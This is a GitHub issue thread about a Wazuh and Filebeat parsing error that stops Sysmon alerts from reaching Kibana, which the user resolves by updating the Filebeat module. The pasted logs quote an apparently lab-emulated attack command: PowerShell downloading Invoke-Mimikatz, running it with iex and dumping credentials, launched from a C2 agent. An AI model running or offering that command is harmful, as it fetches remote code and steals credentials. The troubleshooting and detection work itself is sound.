### ISSUE TITLE
Logformat error

### ISSUE THREAD

**Issue by BernaldoPenasAntelo** [wazuh/wazuh#3945]
Wazuh version | Component | Install type | Install method | Platform
-- | -- | -- | -- | --
3.9.3-1 | logformat | Manager 3.9.3-1/Agent3.9.3-1 | sources.list | Debian 10

Recently i've installed sysmon on one agent, configure it with <localfile> and create custom rules.
The alerts.json it's showing alarms when i test the rules i've created but theyre not been showed in kibana.
Due to my research i've found this parsing error:

`Cannot index event publisher.Event{Content:beat.Event{Timestamp:time.Time{wall:0xbf55ab1afab87977, ext:215048480556, loc:(*time.Location)(0x30d3480)}, Meta:common.MapStr(nil), Fields:common.MapStr{"agent":map[string]interface {}{"id":"003", "ip":"192.168.6.59", "name":"windows2012"}, "data":map[string]interface {}{"win":map[string]interface {}{"eventdata":map[string]interface {}{"commandLine":"powershell.exe -ExecutionPolicy Bypass -C \"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };$web = (New-Object System.Net.WebClient);$result = $web.DownloadString(\\\"https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1\\\");iex $result; Invoke-Mimikatz -DumpCreds;\"", "company":"Microsoft Corporation", "currentDirectory":"C:\\Users\\Administrador\\", "description":"Windows PowerShell", "fileVersion":"6.3.9600.16384 (winblue_rtm.130821-1623)", "hashes":"SHA1=9FA7C81107858AA5E15660BA0640D80C68E8E9CB,MD5=45F9906157E072B92140EAA2A67AE424,SHA256=6A785ADC0263238DAB3EB37F4C185C8FBA7FEB5D425D034CA9864F1BE1C1B473,IMPHASH=099B747A4A31983374E54912D4BB7C44", "image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "integrityLevel":"High", "logonGuid":"{A1E3AA78-FECD-5D75-0000-0020222C0400}", "logonId":"0x42c22", "originalFileName":"PowerShell.EXE", "parentCommandLine":"\"C:\\Users\\Public\\sandcat.exe\"  -server http://192.168.6.58:8888 -group my_group", "parentImage":"C:\\Users\\Public\\sandcat.exe", "parentProcessGuid":"{A1E3AA78-2204-5D76-0000-00105A9D5500}", "parentProcessId":"2776", "processGuid":"{A1E3AA78-34E8-5D76-0000-0010A2C15800}", "processId":"3276", "product":"Microsoft® Windows® Operating System", "terminalSessionId":"2", "user":"WIN-AIEOJTT8UG6\\Administrador", "utcTime":"2019-09-09 11:18:00.294"}, "system":map[string]interface {}{"channel":"Microsoft-Windows-Sysmon/Operational", "computer":"WIN-AIEOJTT8UG6", "eventID":"1", "eventRecordID":"199998", "keywords":"0x8000000000000000", "level":"4", "message":"Process Create:", "opcode":"0", "processID":"3272", "providerGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", "providerName":"Microsoft-Windows-Sysmon", "severityValue":"INFORMATION", "systemTime":"2019-09-09T11:18:00.295729400Z", "task":"1", "threadID":"3128", "version":"5"}}}, "decoder":map[string]interface {}{"name":"windows_eventchannel"}, "full_log":map[string]interface {}{"win":map[string]interface {}{"eventdata":map[string]interface {}{"commandLine":"powershell.exe -ExecutionPolicy Bypass -C \"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };$web = (New-Object System.Net.WebClient);$result = $web.DownloadString(\\\"https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1\\\");iex $result; Invoke-Mimikatz -DumpCreds;\"", "company":"Microsoft Corporation", "currentDirectory":"C:\\Users\\Administrador\\", "description":"Windows PowerShell", "fileVersion":"6.3.9600.16384 (winblue_rtm.130821-1623)", "hashes":"SHA1=9FA7C81107858AA5E15660BA0640D80C68E8E9CB,MD5=45F9906157E072B92140EAA2A67AE424,SHA256=6A785ADC0263238DAB3EB37F4C185C8FBA7FEB5D425D034CA9864F1BE1C1B473,IMPHASH=099B747A4A31983374E54912D4BB7C44", "image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "integrityLevel":"High", "logonGuid":"{A1E3AA78-FECD-5D75-0000-0020222C0400}", "logonId":"0x42c22", "originalFileName":"PowerShell.EXE", "parentCommandLine":"\"C:\\Users\\Public\\sandcat.exe\"  -server http://192.168.6.58:8888 -group my_group", "parentImage":"C:\\Users\\Public\\sandcat.exe", "parentProcessGuid":"{A1E3AA78-2204-5D76-0000-00105A9D5500}", "parentProcessId":"2776", "processGuid":"{A1E3AA78-34E8-5D76-0000-0010A2C15800}", "processId":"3276", "product":"Microsoft® Windows® Operating System", "terminalSessionId":"2", "user":"WIN-AIEOJTT8UG6\\Administrador", "utcTime":"2019-09-09 11:18:00.294"}, "system":map[string]interface {}{"channel":"Microsoft-Windows-Sysmon/Operational", "computer":"WIN-AIEOJTT8UG6", "eventID":"1", "eventRecordID":"199998", "keywords":"0x8000000000000000", "level":"4", "message":"Process Create:", "opcode":"0", "processID":"3272", "providerGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", "providerName":"Microsoft-Windows-Sysmon", "severityValue":"INFORMATION", "systemTime":"2019-09-09T11:18:00.295729400Z", "task":"1", "threadID":"3128", "version":"5"}}}, "id":"1568027883.2550260", "input":common.MapStr{"type":"log"}, "location":"EventChannel", "manager":map[string]interface {}{"name":"CalderaServer"}, "rule":map[string]interface {}{"description":"PowerShell scripts that download content from the Internet", "firedtimes":1, "groups":[]interface {}{"sysmon", "sysmon_process-anomalies"}, "id":"255011", "level":12, "mail":true}, "timestamp":"2019-09-09T13:18:03.862+0200"}, Private:file.State{Id:"", Finished:false, Fileinfo:(*os.fileStat)(0xc000152a90), Source:"/var/ossec/logs/alerts/alerts.json", Offset:4101887, Timestamp:time.Time{wall:0xbf55aae53a7cc81e, ext:44568556, loc:(*time.Location)(0x30d3480)}, TTL:-1, Type:"log", Meta:map[string]string(nil), FileStateOS:file.StateOS{Inode:0x222368, Device:0x805}}, TimeSeries:false}, Flags:0x1} (status=400): {"type":"mapper_parsing_exception","reason":"failed to parse field [full_log] of type [text] in document with id '6Q2-FW0BwIJ29SILve23'. Preview of field's value: '{win={eventdata={originalFileName=PowerShell.EXE, image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe, product=Microsoft® Windows® Operating System, parentProcessGuid={A1E3AA78-2204-5D76-0000-00105A9D5500}, description=Windows PowerShell, logonGuid={A1E3AA78-FECD-5D75-0000-0020222C0400}, parentCommandLine=\"C:\\Users\\Public\\sandcat.exe\"  -server http://192.168.6.58:8888 -group my_group, processGuid={A1E3AA78-34E8-5D76-0000-0010A2C15800}, logonId=0x42c22, parentProcessId=2776, currentDirectory=C:\\Users\\Administrador\\, processId=3276, utcTime=2019-09-09 11:18:00.294, parentImage=C:\\Users\\Public\\sandcat.exe, hashes=SHA1=9FA7C81107858AA5E15660BA0640D80C68E8E9CB,MD5=45F9906157E072B92140EAA2A67AE424,SHA256=6A785ADC0263238DAB3EB37F4C185C8FBA7FEB5D425D034CA9864F1BE1C1B473,IMPHASH=099B747A4A31983374E54912D4BB7C44, company=Microsoft Corporation, integrityLevel=High, commandLine=powershell.exe -ExecutionPolicy Bypass -C \"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };$web = (New-Object System.Net.WebClient);$result = $web.DownloadString(\\\"https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1\\\");iex $result; Invoke-Mimikatz -DumpCreds;\", user=WIN-AIEOJTT8UG6\\Administrador, fileVersion=6.3.9600.16384 (winblue_rtm.130821-1623), terminalSessionId=2}, system={eventID=1, keywords=0x8000000000000000, level=4, providerGuid={5770385F-C22A-43E0-BF4C-06F5698FFBD9}, channel=Microsoft-Windows-Sysmon/Operational, opcode=0, message=Process Create:, systemTime=2019-09-09T11:18:00.295729400Z, version=5, threadID=3128, eventRecordID=199998, computer=WIN-AIEOJTT8UG6, task=1, severityValue=INFORMATION, processID=3272, providerName=Microsoft-Windows-Sysmon}}}'","caused_by":{"type":"illegal_state_exception","reason":"Can't get text on a START_OBJECT at 1:393"}}`

Can u help me fixing this issue?

**Comment by adri9valle** [comment]
Hi @BernaldoPenasAntelo,

The problem is that elastic expects to receive the `full_log` field as text type, but the `full_log` in this alert comes as `object` type.

This is a known problem, to solve this I advise you that upgrade Wazuh to the current version 3.9.5 where this problem is solved.

I hope it helps for you, if you have any doubt or problems during the upgrade process, please, don't hesitate to ask again.

Regards,

**Comment by BernaldoPenasAntelo** [comment]
Hi:
thanks for the respponse, i updated wazuh-manager to 3.9.5-1 and agent to 3.9.5 but still getting the same errors.

`(status=400): {"type":"**mapper_parsing_exception**","reason":"**failed to parse field [full_log] of type [text]** in document with id 'im0BOW0BwIJ29SILuaex'. Preview of field's value: '{win={eventdata={originalFileName=PowerShell.EXE, image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe, product=Microsoft® Windows® Operating System, parentProcessGuid={A1E3AA78-3B80-5D7F-0000-001078510602}, description=Windows PowerShell, logonGuid={A1E3AA78-FECD-5D75-0000-0020222C0400}, parentCommandLine=\"C:\\Users\\Public\\sandcat.exe\"  -server http://192.168.6.58:8888 -group my_group, logonId=0x42c22, parentProcessId=3032, processGuid={A1E3AA78-3BD0-5D7F-0000-001082910802}, currentDirectory=C:\\Users\\Administrador\\, processId=2976, utcTime=2019-09-16 07:37:52.180, parentImage=C:\\Users\\Public\\sandcat.exe, hashes=SHA1=9FA7C81107858AA5E15660BA0640D80C68E8E9CB,MD5=45F9906157E072B92140EAA2A67AE424,SHA256=6A785ADC0263238DAB3EB37F4C185C8FBA7FEB5D425D034CA9864F1BE1C1B473,IMPHASH=099B747A4A31983374E54912D4BB7C44, company=Microsoft Corporation, integrityLevel=High, commandLine=powershell.exe -ExecutionPolicy Bypass -C Get-Process, fileVersion=6.3.9600.16384 (winblue_rtm.130821-1623), user=WIN-AIEOJTT8UG6\\Administrador, terminalSessionId=2}, system={eventID=1, keywords=0x8000000000000000, level=4, providerGuid={5770385F-C22A-43E0-BF4C-06F5698FFBD9}, channel=Microsoft-Windows-Sysmon/Operational, opcode=0, message=Process Create:, systemTime=2019-09-16T07:37:52.181481000Z, version=5, eventRecordID=202745, threadID=3128, computer=WIN-AIEOJTT8UG6, task=1, processID=3272, severityValue=INFORMATION, providerName=Microsoft-Windows-Sysmon}}}'","caused_by":{"type":**"illegal_state_exception","reason":"Can't get text on a START_OBJECT at 1:200**"}}`

**Comment by BernaldoPenasAntelo** [comment]
I found the way to solve this problem, what i have to update it's filebeat following the documentation:

https://documentation.wazuh.com/3.9/installation-guide/installing-wazuh-manager/linux/debian/wazuh_server_packages_deb.html?highlight=filebeat

This inserts the wazuh module from filebeat, and it works great, now i get alarms

**Comment by adri9valle** [comment]
Hi @BernaldoPenasAntelo,

Yes, you need to update the filebeat configuration in order to use the new Wazuh module for filebeat.

I'm glad that it works for you, if you have any further problem don't hesitate to open a new issue.

Regards,

Adri,
